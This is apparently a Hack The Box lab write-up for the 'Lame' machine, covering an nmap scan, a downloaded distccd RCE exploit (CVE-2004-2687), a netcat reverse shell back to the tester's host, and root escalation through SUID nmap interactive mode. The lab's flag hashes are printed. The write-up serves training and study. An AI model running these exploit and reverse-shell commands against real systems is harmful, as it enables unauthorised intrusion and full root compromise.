HTB Lame done
Lame
OS:
Linux
Notes
21 FTP - anonymous empty folder
22 SSH - stop
139/445 SMB - to test
3632 distccd - to test
Technology:
vsftpd 2.3.4
distccd v1 ((GNU) 4.2.4
IP Address:
10.10.10.3
Open ports:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Users and pass:
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.10.3_nmap 10.10.10.3 ; cat 10.10.10.3_nmap.nmap | grep "tcp.*open"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 13:49 CEST
Nmap scan report for 10.10.10.3
Host is up (0.031s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.15.88
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (91%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m24s, deviation: 2h49m46s, median: 21s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-08-01T07:53:24-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Exploit: (CVE-2004-2687) DistCC Daemon - Command Execution (Python)
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/261b638bb05d02b67b6ad67fa9cf3c74a73de6c6/distccd_rce_CVE-2004-2687.py
--2024-08-01 14:11:58-- https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/261b638bb05d02b67b6ad67fa9cf3c74a73de6c6/distccd_rce_CVE-2004-2687.py
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2631 (2.6K) [text/plain]
Saving to: ‘distccd_rce_CVE-2004-2687.py’
distccd_rce_CVE-2004-2687.py 100%[==============================================>] 2.57K --.-KB/s in 0s
2024-08-01 14:11:59 (62.3 MB/s) - ‘distccd_rce_CVE-2004-2687.py’ saved [2631/2631]
Run exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ python2 distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -c "nc 10.10.15.88 80 -e /bin/bash"
[OK] Connected to remote service
[KO] Socket Timeout
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.10.3] 37005
whereis python
python: /usr/bin/python2.5-config /usr/bin/python /usr/bin/python2.5 /etc/python /etc/python2.5 /usr/lib/python2.3 /usr/lib/python2.5 /usr/lib/python2.4 /usr/local/lib/python2.5 /usr/include/python2.5 /usr/share/python /usr/share/man/man1/python.1.gz
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
daemon@lame:/tmp$
Read flag: user.txt
daemon@lame:/tmp$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/makis/user.txt
daemon@lame:/tmp$
daemon@lame:/tmp$ cd /home/makis
cd /home/makis
daemon@lame:/home/makis$
daemon@lame:/home/makis$ ls -la
ls -la
total 36
drwxr-xr-x 4 makis makis 4096 Aug 1 06:25 .
drwxr-xr-x 6 root root 4096 Mar 14 2017 ..
-rw------- 1 makis makis 1107 Mar 14 2017 .bash_history
-rw-r--r-- 1 makis makis 220 Mar 14 2017 .bash_logout
-rw-r--r-- 1 makis makis 2928 Mar 14 2017 .bashrc
drwx------ 2 makis makis 4096 Aug 1 06:25 .gconf
drwx------ 2 makis makis 4096 Aug 1 06:25 .gconfd
-rw-r--r-- 1 makis makis 586 Mar 14 2017 .profile
-rw-r--r-- 1 makis makis 0 Mar 14 2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis 33 Aug 1 06:15 user.txt
daemon@lame:/home/makis$
daemon@lame:/home/makis$ cat user.txt ; id ; ip
cat user.txt ; id ; ip
b8e710c5ad51ecd248bc358caf29f621
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
ip [ -force ] [-batch filename
where OBJECT := { link | addr | route | rule | neigh | ntable | tunnel |
maddr | mroute | monitor | xfrm }
OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |
-f[amily] { inet | inet6 | ipx | dnet | link } |
-o[neline] | -t[imestamp] }
daemon@lame:/home/makis$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
b8e710c5ad51ecd248bc358caf29f621
uid=1(daemon) gid=1(daemon) groups=1(daemon)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:94:f2:aa brd ff:ff:ff:ff:ff:ff
inet 10.10.10.3/24 brd 10.10.10.255 scope global eth0
inet6 dead:beef::250:56ff:fe94:f2aa/64 scope global dynamic
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:fe94:f2aa/64 scope link
valid_lft forever preferred_lft forever
daemon@lame:/home/makis$
Privilege Escalation
Find SUID
daemon@lame:/var/backups$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
GTFObins - nmap
daemon@lame:/home/makis$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
Read flag: root.txt
sh-3.2# cd /root
cd /root
sh-3.2# ls -la
ls -la
total 80
drwxr-xr-x 13 root root 4096 Aug 1 06:15 .
drwxr-xr-x 21 root root 4096 Oct 31 2020 ..
-rw------- 1 root root 373 Aug 1 06:15 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
drwx------ 3 root root 4096 May 20 2012 .config
drwx------ 2 root root 4096 May 20 2012 .filezilla
drwxr-xr-x 5 root root 4096 Aug 1 06:15 .fluxbox
drwx------ 2 root root 4096 May 20 2012 .gconf
drwx------ 2 root root 4096 May 20 2012 .gconfd
drwxr-xr-x 2 root root 4096 May 20 2012 .gstreamer-0.10
drwx------ 4 root root 4096 May 20 2012 .mozilla
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 5 root root 4096 May 20 2012 .purple
-rwx------ 1 root root 4 May 20 2012 .rhosts
drwxr-xr-x 2 root root 4096 May 20 2012 .ssh
drwx------ 2 root root 4096 Aug 1 06:15 .vnc
drwxr-xr-x 2 root root 4096 May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw------- 1 root root 33 Aug 1 06:15 root.txt
-rw-r--r-- 1 root root 118 Aug 1 06:15 vnc.log
sh-3.2#
sh-3.2# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
66371e4b13ed785c278b931de4ed9ffd
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:94:f2:aa brd ff:ff:ff:ff:ff:ff
inet 10.10.10.3/24 brd 10.10.10.255 scope global eth0
inet6 dead:beef::250:56ff:fe94:f2aa/64 scope global dynamic
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:fe94:f2aa/64 scope link
valid_lft forever preferred_lft forever
sh-3.2#
References
[(CVE-2004-2687) DistCC Daemon - Command Execution (Python)](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Lessons Learned